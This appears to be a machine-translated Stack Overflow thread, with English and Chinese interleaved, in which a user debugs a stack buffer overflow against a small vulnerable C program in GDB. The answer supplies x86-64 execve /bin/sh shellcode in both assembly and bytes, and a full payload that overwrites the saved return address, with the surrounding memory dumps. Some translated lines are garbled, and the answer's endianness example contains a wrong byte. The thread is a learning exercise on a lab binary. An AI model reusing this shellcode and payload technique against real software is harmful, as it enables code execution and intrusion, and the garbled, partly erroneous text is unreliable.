我正在尝试利用缓冲区溢出，我做错了什么？

Question

I'm trying to execute a buffer overflow exploit using this tutorial Everything in my post will be execute directly inside GDB. 我正在尝试使用本教程执行缓冲区溢出漏洞。我的帖子中的所有内容都将直接在GDB中执行。

https://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflow/ https://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflow/

and this is the code on which I would like to exploit a buffer overflow. 这是我想利用缓冲区溢出的代码。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int     main(int argc, char *argv[])
{
  char  buff[256];

  if (argc == 1)
    {
      printf("Usage: %s input\n", argv[0]);
      exit (0);
    }
  strcpy(buff, argv[1]);
  printf("%s\n", buff);
  return (1);
}

I'm currently working on Linux mint 18 and I have a processor 64bits. 我目前正在研究Linux mint 18，我有64位处理器。 Given I have a 64bits architecture. 鉴于我有64位架构。 Every address is on 8 bytes. 每个地址都是8个字节。 And now lets imagine my current stakframe. 现在让我们想象一下我当前的stakframe。

| | buff[256] | buff [256] |

| | RBP | RBP |

| | SAVE RIP | 保存RIP |

My goal is to overwrite the "SAVE RIP" by the address of my "nop sled". 我的目标是用“nop sled”的地址覆盖“SAVE RIP”。 Given I'm on an 64bits architecture. 鉴于我是64位架构。 I'm going to fill the variable buff with 256 + 8 charactere. 我打算用256 + 8字符填充变量buff。 the 8 charactere will serve to overwrite the RBP pointer. 8个字符将用于覆盖RBP指针。 I'm going to overwrite using perl. 我要用perl覆盖。

perl -e 'print "\\x90" x 264'

And then using the shellcode which is provide in the tutorial I followed 然后使用我遵循的教程中提供的shellcode

perl -e 'print "\\x90" x (264 - 26) . "\\x90\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"'

I subtracted 26 because the shellcode is of length 26. 我减去了26因为shellcode长度为26。

And now. 现在。 I'm going to find out what is the address of my nop sled using GDB. 我要找出使用GDB的nop雪橇的地址是什么。

   0x00000000004005f6 <+0>: push   rbp
   0x00000000004005f7 <+1>: mov    rbp,rsp
   0x00000000004005fa <+4>: sub    rsp,0x110
   0x0000000000400601 <+11>:    mov    DWORD PTR [rbp-0x104],edi
   0x0000000000400607 <+17>:    mov    QWORD PTR [rbp-0x110],rsi
   0x000000000040060e <+24>:    cmp    DWORD PTR [rbp-0x104],0x1
   0x0000000000400615 <+31>:    jne    0x40063d <main+71>
   0x0000000000400617 <+33>:    mov    rax,QWORD PTR [rbp-0x110]
   0x000000000040061e <+40>:    mov    rax,QWORD PTR [rax]
   0x0000000000400621 <+43>:    mov    rsi,rax
   0x0000000000400624 <+46>:    mov    edi,0x400704
   0x0000000000400629 <+51>:    mov    eax,0x0
   0x000000000040062e <+56>:    call   0x4004c0 <printf@plt>
   0x0000000000400633 <+61>:    mov    edi,0x0
   0x0000000000400638 <+66>:    call   0x4004e0 <exit@plt>
   0x000000000040063d <+71>:    mov    rax,QWORD PTR [rbp-0x110]
   0x0000000000400644 <+78>:    add    rax,0x8
   0x0000000000400648 <+82>:    mov    rdx,QWORD PTR [rax]
   0x000000000040064b <+85>:    lea    rax,[rbp-0x100]
   0x0000000000400652 <+92>:    mov    rsi,rdx
   0x0000000000400655 <+95>:    mov    rdi,rax
   0x0000000000400658 <+98>:    call   0x4004a0 <strcpy@plt>
=> 0x000000000040065d <+103>:   lea    rax,[rbp-0x100]
   0x0000000000400664 <+110>:   mov    rdi,rax
   0x0000000000400667 <+113>:   call   0x4004b0 <puts@plt>
   0x000000000040066c <+118>:   mov    eax,0x1
   0x0000000000400671 <+123>:   leave  
   0x0000000000400672 <+124>:   ret

I add a breakpoint juste after the strcpy function. 我在strcpy函数之后添加了一个断点juste。 and I'm trying to to find out the begining of the sled nop using 而我正试图找出使用雪橇的开始

x/x $rsp

which show me 哪个告诉我

0x7fffffffde20: 0xffffe018

Then I'm going to do 那我就去做

x/s 0x7fffffffde20

and press 'Enter' until I find what I'm looking for. 然后按“Enter”直到找到我要找的东西。

And now, come the second problem. 现在，来第二个问题。 I found two different address which seem contain the nop sled 我发现两个不同的地址似乎包含了nop雪橇

0x7fffffffde30: '\220' <repeats 200 times>...
(gdb) 
0x7fffffffdef8: '\220' <repeats 39 times>, "\061\300Phn/shh//bi\211\343P\211\342S\211\341\260\v̀"

and 和

0x7fffffffe32d: '\220' <repeats 200 times>...
(gdb) 
0x7fffffffe3f5: '\220' <repeats 39 times>, "\061\300Phn/shh//bi\211\343P\211\342S\211\341\260\v̀"

Not knowing which one to choose, I decided to try both of them. 不知道选择哪一个，我决定尝试这两个。 However assuming that I'm using the first one, more precisely 0x7fffffffde30. 假设我正在使用第一个，更准确地说是0x7fffffffde30。 (without forget to take car of the endianess). （不要忘记带上endianess的车）。

I'll try to execute my code using the following command line: 我将尝试使用以下命令行执行我的代码：

(gdb) run  `perl -e 'print "\x90" x (264 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7f\xff\xff\xff\xde\x30"'`

then I verify if the RIP was correctly overwrite by the desire address. 然后我验证RIP是否被欲望地址正确覆盖。

(gdb) info frame
Stack level 0, frame at 0x7fffffffdf30:
 rip = 0x40065d in main (hacking.c:15); saved rip = 0x30deffffff7f
 source language c.
 Arglist at 0x7fffffffdf20, args: argc=2, argv=0x7fffffffe008
 Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28
(gdb)

And we can see that the saved RIP was successfully overwrite by the desire address. 我们可以看到保存的RIP被欲望地址成功覆盖。 The main problem now is when I press "Continue" my program segfault without open any shell. 现在的主要问题是当我按下“继续”我的程序段错误而不打开任何shell。 I follow exactly what it explain in the tutorial so does anyone can explain me: 我完全按照它在教程中解释的内容，所以任何人都可以解释我：

-Why it segfault when I write 263 byte inside the buffer ? - 当我在缓冲区内写入263字节时，为什么会出现段错误？ A program can segfault when I overwrite "save RIP", is it the same for RBP ? 当我覆盖“保存RIP”时，程序会出现段错误，对于RBP是否相同？

-I found out two different address which contain my nop sled, which one have I to choose ? - 我发现了两个不同的地址，其中包含我的nop雪橇，哪一个我可以选择？

-And Finally, according to you, did I do something wrong or which seem not logical ? - 最后，根据你的说法，我做错了什么或看起来不合逻辑？ I have no idea why my exploit does work and didn't find nobody else on internet which has the same problem like me. 我不知道为什么我的漏洞利用确实有效，并且没有在互联网上找到像我这样有同样问题的其他人。

Thanks 谢谢

I'm compiling using this way 我正在用这种方式编译

sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space' gcc
hacking.c -fno-stack-protector -g3 -z execstack

EDIT: 编辑：

Thank you for you comment. 谢谢你的评论。 I did what you told me but it still segfault. 我做了你告诉我的，但它仍然是段错误。

Hello @russtone. 你好@russtone。

Thank you for you answer, I did what you told me but it still segfault. 谢谢你的回答，我做了你告诉我的，但它仍然是段错误。

`
(gdb) x/300bx $rsp
0x7fffffffdc70: 0x68    0xde    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffdc78: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00

===> 0x7fffffffdc80:    0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90

0x7fffffffdc88: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdc90: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdc98: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdca0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdca8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcb0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcb8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcc0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcc8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcd0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcd8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdce0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdce8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcf0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdcf8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd10: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd18: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd20: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd28: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd30: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd38: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd40: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd48: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd50: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd58: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd60: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffdd68: 0x90    0x90    0x90    0x48    0x31    0xff    0x57    0x57
0x7fffffffdd70: 0x5e    0x5a    0x48    0xbf    0x2f    0x2f    0x62    0x69
0x7fffffffdd78: 0x6e    0x2f    0x73    0x68    0x48    0xc1    0xef    0x08
0x7fffffffdd80: 0x57    0x54    0x5f    0x6a    0x3b    0x58    0x0f    0x05
0x7fffffffdd88: 0x90    0xdc    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffdd90: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

I use this address without forget the endianess. 我使用这个地址而不忘记结束。

"0x7fffffffdc80" “0x7fffffffdc80”

which give me 给我的

"\\x80\\xdc\\xff\\xff\\xff\\x7f" “\\ X80 \\ XDC \\ XFF \\ XFF \\ XFF \\ 0x7F部分”

So the final command in GDB is 所以GDB中的最终命令是

(gdb) run `perl -e 'print "\x90" x (264 - 29) . "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" . "\x80\xdc\xff\xff\xff\x7f"'`

and then 然后

continue 继续

which display 哪个显示

Continuing. 继续。 H1 WW^ZH //bin/shH WT_j;X H1WW ^ ZH //斌/ shHWT_j; X

Program received signal SIGSEGV, Segmentation fault. 程序接收信号SIGSEGV，分段故障。 0x00007fffffffdd80 in ?? 0x00007fffffffdd80在？ () （）

Thanks 谢谢

Answer 1

Why it segfault when I write 263 byte inside the buffer ? 当我在缓冲区内写入263字节时为什么会出现段错误？ A program can segfault when I overwrite "save RIP", is it the same for RBP ? 当我覆盖“保存RIP”时，程序会出现段错误，对于RBP是否相同？

In your example segmentation fault occurs when a program attempts to access a memory at address 0x30deffffff7f which doesn't belong to it. 在您的示例中，当程序试图访问不属于它的地址0x30deffffff7f的内存时，会发生分段故障。 You wanted to overwrite RIP with 0x7fffffffde30 instead of 0x30deffffff7f but you pass wrong payload. 您想用0x7fffffffde30而不是0x30deffffff7f覆盖RIP，但是您传递了错误的有效负载。 Because you have little-endian architecture in your payload instead of: 因为您的有效负载中有little-endian架构而不是：

... "\x7f\xff\xff\xff\xde\x30"

you need to pass: 你需要通过：

... "\x30\xde\xff\xff\xff\x7e"

Also I'm not sure that address of you shellcode is 0x7fffffffde30 because x/s $rsp isn't best way to know it. 另外我不确定你shellcode的地址是0x7fffffffde30因为x/s $rsp并不是最好的方法。 It is better to use something like: 最好使用类似的东西：

(gdb) x/300bx $rsp
0x7fffffffd220: 0x18    0xd4    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffd228: 0xf6    0x77    0xde    0xf7    0x02    0x00    0x00    0x00
0x7fffffffd230: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd238: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd240: 0x90    0x90    0x90    0x90    0x48    0x31    0xff    0x57
0x7fffffffd248: 0x57    0x5e    0x5a    0x48    0xbf    0x2f    0x2f    0x62
0x7fffffffd250: 0x69    0x6e    0x2f    0x73    0x68    0x48    0xc1    0xef
0x7fffffffd258: 0x08    0x57    0x54    0x5f    0x6a    0x3b    0x58    0x0f
0x7fffffffd260: 0x05    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd268: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd270: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd278: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd280: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd288: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd290: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd298: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2a0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2a8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2b0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2b8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2c0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2c8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2d0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2d8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2e0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2e8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2f0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd2f8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd300: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd308: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd310: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd318: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd320: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd328: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd330: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd338: 0x40    0xd2    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffd340: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7fffffffd348: 0x18    0xd4    0xff    0xff

In above example shelcode is "\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05" and address for it can be something like 0x7fffffffd240 . 在上面的例子中，shelcode是"\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05"和它的地址可能类似于0x7fffffffd240 。

I found out two different address which contain my nop sled, which one have I to choose ? 我发现了两个不同的地址，其中包含我的nop雪橇，哪一个我可以选择？

The first address you find is your buffer char buff[256] and the second is argv[1] . 你找到的第一个地址是你的缓冲区char buff[256] ，第二个地址是argv[1] 。 Unix-like systems put argv on the stack so in your example it does not matter which to choose. 类Unix系统将argv放在堆栈上，因此在您的示例中，选择哪个并不重要。 But in general (for any OS) you need to use the address of char buff[256] . 但一般情况下（对于任何操作系统），您需要使用char buff[256]的地址。

And Finally, according to you, did I do something wrong or which seem not logical ? 最后，根据你的说法，我做错了什么或看起来不符合逻辑？ I have no idea why my exploit does work and didn't find nobody else on internet which has the same problem like me. 我不知道为什么我的漏洞利用确实有效，并且没有在互联网上找到像我这样有同样问题的其他人。

The first thing which I have already mentioned above is endianness . 我上面提到的第一件事是字节序。 You have little-endian machine so you need to pass \\x30\\xde\\xff\\xff\\xff\\x7e instead of \\x7f\\xff\\xff\\xff\\xde\\x30 . 你有小端机器，所以你需要传递\\x30\\xde\\xff\\xff\\xff\\x7e而不是\\x7f\\xff\\xff\\xff\\xde\\x30 。

The second thing is your shellcode. 第二件事是你的shellcode。 You are using shellcode from example for x86 program but you need shellcode for x64. 您正在使用x86程序示例中的shellcode，但您需要x64的shellcode。 You can use something like this: 你可以使用这样的东西：

SECTION .text
global _start
_start:
    xor rdi, rdi
    push rdi
    push rdi
    pop rsi
    pop rdx
    mov rdi, 0x68732f6e69622f2f ; hs/nib//
    shr rdi, 8 ; \x00hs/nib/
    push rdi
    push rsp
    pop rdi
    push 0x3b ; execve
    pop rax
    syscall

Which in bytecode will be: 在字节码中将是：

"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

Hope this helps. 希望这可以帮助。 Good luck! 祝好运！

UPDATE UPDATE

Ok, so now you overwritten the rip and according to output of gdb you successfully jumped to correct address. 好的，所以现在你覆盖了rip并根据gdb的输出成功跳转到了正确的地址。

The problem now is that you shell code is too close to buffer bound. 现在的问题是你的shell代码太靠近缓冲区绑定了。

Thus you get the picture: 因此你得到了图片：

Then at the end of main function after commands 然后在main函数结束后命令

leave
ret

you jumped to addr_1 and rsp = addr_2 + 8 (after leave ie mov rsp, rbp; pop rbp ). 你跳到了addr_1和addr_1 rsp = addr_2 + 8 （ leave之后，即mov rsp, rbp; pop rbp ）。 But at the start of shell code you can see 2 push instructions after executions of which $rsp = addr_2 + 8 - 16 = addr_2 - 8 . 但是在shell代码的开头你可以看到执行后的2个push指令，其中$rsp = addr_2 + 8 - 16 = addr_2 - 8 。 But addr_2 - 8 is last 8 bytes of your shell code! 但addr_2 - 8是shell代码的最后8个字节！ Thus your shell code overwrites itself and you get segfault. 因此，您的shell代码会覆盖自己，并且您会遇到段错误。

To avoid this you can just put your shell code somewhere in the middle of buf : 为了避免这种情况，您可以将shell代码放在buf中间的某个位置：

(gdb) run `perl -e 'print "\x90" x (200 - 29) . "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" . "\x90" x 64 . "\x10\xd2\xff\xff\xff\x7f"'`

我正在尝试利用缓冲区溢出，我做错了什么？

问题描述

1 个解决方案

解决方案1
5 已采纳 2016-07-28 12:21:07

我正在尝试利用缓冲区溢出，我做错了什么？

问题描述

1 个解决方案

解决方案1 5 已采纳 2016-07-28 12:21:07

解决方案1
5 已采纳 2016-07-28 12:21:07